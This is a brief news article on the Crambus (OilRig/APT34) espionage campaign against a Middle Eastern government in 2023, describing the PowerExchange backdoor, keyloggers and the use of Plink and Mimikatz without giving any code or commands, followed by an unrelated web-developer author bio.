The Iranian espionage group known as Crambus, also known as OilRig, MuddyWater, APT34, conducted an extensive intrusion against a Middle Eastern government for eight months, from February to September 2023. The attackers stole files and passwords and planted a PowerShell backdoor called PowerExchange, which allowed them to monitor incoming emails sent from an Exchange Server and execute commands sent via email.

They also deployed backdoors and keyloggers on several computers. To gain remote access, the attackers used the network administration tool Plink to configure port-forwarding rules and modified Windows firewall rules. Crambus has a history of targeting various countries, including Saudi Arabia, Israel, United Arab Emirates, Iraq, Jordan, Lebanon, Kuwait, Qatar, Albania, the US, and Turkey. They are known for their long-running, intelligence-gathering operations and have recently incorporated social engineering into their attacks.

During this particular attack, Crambus deployed three previously unidentified malware pieces and utilized legitimate tools such as Mimikatz and Plink. The attackers’ activities were first detected in February 2023, and their malicious actions continued throughout the following months, targeting multiple computers and servers.


Full Stack Developer

About the Author

I’m passionate about web development and design in all its forms, helping small businesses build and improve their online presence. I spend a lot of time learning new techniques and actively helping other people learn web development through a variety of help groups and writing tutorials for my blog about advancements in web design and development.

View Articles